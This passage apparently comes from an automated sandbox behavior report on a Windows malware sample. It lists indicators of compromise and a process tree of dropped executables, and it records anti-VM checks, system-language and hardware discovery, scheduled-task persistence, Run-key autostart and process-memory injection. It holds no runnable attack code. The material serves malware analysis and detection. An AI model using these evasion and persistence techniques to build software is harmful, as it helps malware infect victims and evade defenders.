behavioral2/memory/4588-695-0x00007FFD4E130000-0x00007FFD4E650000-memory.dmp upx behavioral2/memory/4588-694-0x00007FFD5E4C0000-0x00007FFD5E4F3000-memory.dmp upx behavioral2/memory/4588-693-0x00007FFD60430000-0x00007FFD6043D000-memory.dmp upx behavioral2/memory/4588-692-0x00007FFD5E500000-0x00007FFD5E536000-memory.dmp upx behavioral2/memory/4588-691-0x00007FFD5E620000-0x00007FFD5E64D000-memory.dmp upx behavioral2/memory/4588-690-0x00007FFD61F80000-0x00007FFD61F99000-memory.dmp upx behavioral2/memory/4588-688-0x00007FFD61FB0000-0x00007FFD61FC9000-memory.dmp upx behavioral2/memory/4588-687-0x00007FFD61FD0000-0x00007FFD61FDF000-memory.dmp upx behavioral2/memory/4588-686-0x00007FFD62290000-0x00007FFD622B3000-memory.dmp upx behavioral2/memory/4588-685-0x00007FFD4E650000-0x00007FFD4EC39000-memory.dmp upx behavioral2/memory/4588-689-0x00007FFD61FA0000-0x00007FFD61FAD000-memory.dmp upx -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\ehjl.job kdMujZh.exe File opened for modification C:\Windows\Tasks\ehjl.job kdMujZh.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023db8-429.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 14 IoCs
pid pid_target Process procid_target 1736 3904 WerFault.exe 97 4984 1456 WerFault.exe 102 3208 3884 WerFault.exe 106 4036 1384 WerFault.exe 111 1872 3388 WerFault.exe 150 4880 1632 WerFault.exe 156 5484 4460 WerFault.exe 161 4800 5948 WerFault.exe 173 3628 5568 WerFault.exe 179 2948 5648 WerFault.exe 189 2772 1788 WerFault.exe 205 456 2864 WerFault.exe 216 1476 3900 WerFault.exe 221 5196 820 WerFault.exe 143 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 47fce15d5f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 0b0234d421.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 92c7e4ad44.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221457afdd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 0b0234d421.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 468c3dbc43.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 17ac8e74ea.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ce41c0292a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ehjl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d60014756.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c29bfe45e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f8fc74dfc3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 f8fc74dfc3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString f8fc74dfc3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2084 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 5968 taskkill.exe 5432 taskkill.exe 2608 taskkill.exe 5688 taskkill.exe 6048 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133845008490031486" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5008 schtasks.exe 2636 schtasks.exe 1660 schtasks.exe 4256 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1228 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 1228 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 1340 skotes.exe 1340 skotes.exe 3268 3omTNLZ.exe 3268 3omTNLZ.exe 3268 3omTNLZ.exe 3268 3omTNLZ.exe 3268 3omTNLZ.exe 3268 3omTNLZ.exe 4772 YMci4Rc.exe 4772 YMci4Rc.exe 4772 YMci4Rc.exe 4772 YMci4Rc.exe 1972 9aiiMOQ.exe 1972 9aiiMOQ.exe 1972 9aiiMOQ.exe 1972 9aiiMOQ.exe 1616 NL58452.exe 1616 NL58452.exe 1616 NL58452.exe 1616 NL58452.exe 1816 skotes.exe 1816 skotes.exe 3256 f3Ypd8O.exe 3256 f3Ypd8O.exe 3256 f3Ypd8O.exe 3256 f3Ypd8O.exe 1940 kdMujZh.exe 1940 kdMujZh.exe 2168 powershell.exe 2168 powershell.exe 4212 powershell.exe 4212 powershell.exe 1940 kdMujZh.exe 1940 kdMujZh.exe 1384 ehjl.exe 1384 ehjl.exe 2272 powershell.exe 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 2272 powershell.exe 2272 powershell.exe 3904 powershell.exe 3904 powershell.exe 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 1060 powershell.exe 1060 powershell.exe 3976 483d2fa8a0d53818306efeb32d3.exe 3976 483d2fa8a0d53818306efeb32d3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 820 f8fc74dfc3.exe 2140 47fce15d5f.exe 2140 47fce15d5f.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 3904 powershell.exe Token: SeDebugPrivilege 436 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Token: SeDebugPrivilege 1060 powershell.exe Token: SeShutdownPrivilege 4856 chrome.exe Token: SeCreatePagefilePrivilege 4856 chrome.exe Token: SeDebugPrivilege 6012 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 5260 powershell.exe Token: SeShutdownPrivilege 2428 chrome.exe Token: SeCreatePagefilePrivilege 2428 chrome.exe Token: SeShutdownPrivilege 2428 chrome.exe Token: SeCreatePagefilePrivilege 2428 chrome.exe Token: SeShutdownPrivilege 2428 chrome.exe Token: SeCreatePagefilePrivilege 2428 chrome.exe Token: SeShutdownPrivilege 2428 chrome.exe Token: SeCreatePagefilePrivilege 2428 chrome.exe Token: SeShutdownPrivilege 2428 chrome.exe Token: SeCreatePagefilePrivilege 2428 chrome.exe Token: SeShutdownPrivilege 2428 chrome.exe Token: SeCreatePagefilePrivilege 2428 chrome.exe Token: SeShutdownPrivilege 2428 chrome.exe Token: SeCreatePagefilePrivilege 2428 chrome.exe Token: SeDebugPrivilege 5968 taskkill.exe Token: SeDebugPrivilege 5432 taskkill.exe Token: SeDebugPrivilege 2608 taskkill.exe Token: SeDebugPrivilege 5676 powershell.exe Token: SeDebugPrivilege 5688 taskkill.exe Token: SeDebugPrivilege 6048 taskkill.exe Token: SeDebugPrivilege 3664 firefox.exe Token: SeDebugPrivilege 3664 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1228 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 4024 amnew.exe 1584 221457afdd.exe 1584 221457afdd.exe 1584 221457afdd.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 4856 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 2428 chrome.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 4320 92c7e4ad44.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 1584 221457afdd.exe 1584 221457afdd.exe 1584 221457afdd.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 4320 92c7e4ad44.exe 4320 92c7e4ad44.exe 4320 92c7e4ad44.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 5148 0b0234d421.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 3664 firefox.exe 5148 0b0234d421.exe 5148 0b0234d421.exe 5148 0b0234d421.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3664 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1228 wrote to memory of 1340 1228 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 88 PID 1228 wrote to memory of 1340 1228 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 88 PID 1228 wrote to memory of 1340 1228 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 88 PID 1340 wrote to memory of 3268 1340 skotes.exe 90 PID 1340 wrote to memory of 3268 1340 skotes.exe 90 PID 1340 wrote to memory of 3268 1340 skotes.exe 90 PID 1340 wrote to memory of 4796 1340 skotes.exe 95 PID 1340 wrote to memory of 4796 1340 skotes.exe 95 PID 1340 wrote to memory of 3904 1340 skotes.exe 97 PID 1340 wrote to memory of 3904 1340 skotes.exe 97 PID 1340 wrote to memory of 3904 1340 skotes.exe 97 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 3904 wrote to memory of 4772 3904 YMci4Rc.exe 98 PID 1340 wrote to memory of 1456 1340 skotes.exe 102 PID 1340 wrote to memory of 1456 1340 skotes.exe 102 PID 1340 wrote to memory of 1456 1340 skotes.exe 102 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1456 wrote to memory of 1972 1456 9aiiMOQ.exe 103 PID 1340 wrote to memory of 3884 1340 skotes.exe 106 PID 1340 wrote to memory of 3884 1340 skotes.exe 106 PID 1340 wrote to memory of 3884 1340 skotes.exe 106 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 3884 wrote to memory of 1616 3884 NL58452.exe 107 PID 1340 wrote to memory of 1384 1340 skotes.exe 111 PID 1340 wrote to memory of 1384 1340 skotes.exe 111 PID 1340 wrote to memory of 1384 1340 skotes.exe 111 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1384 wrote to memory of 3256 1384 f3Ypd8O.exe 112 PID 1340 wrote to memory of 1940 1340 skotes.exe 115 PID 1340 wrote to memory of 1940 1340 skotes.exe 115 PID 1340 wrote to memory of 1940 1340 skotes.exe 115 PID 1340 wrote to memory of 4024 1340 skotes.exe 116 PID 1340 wrote to memory of 4024 1340 skotes.exe 116 PID 1340 wrote to memory of 4024 1340 skotes.exe 116 PID 4024 wrote to memory of 1224 4024 amnew.exe 117 PID 4024 wrote to memory of 1224 4024 amnew.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe"C:\Users\Admin\AppData\Local\Temp\f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"3⤵
- Executes dropped EXE
PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 7724⤵
- Program crash
PID:1736
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 8044⤵
- Program crash
PID:4984
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 8044⤵
- Program crash
PID:3208
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 7884⤵
- Program crash
PID:4036
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1940
-
-
C:\Users\Admin\AppData\Local\Temp\1088667001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1088667001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4588
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 8286⤵
- Program crash
PID:5484
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5948 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 9566⤵
- Program crash
PID:4800
-
-
-
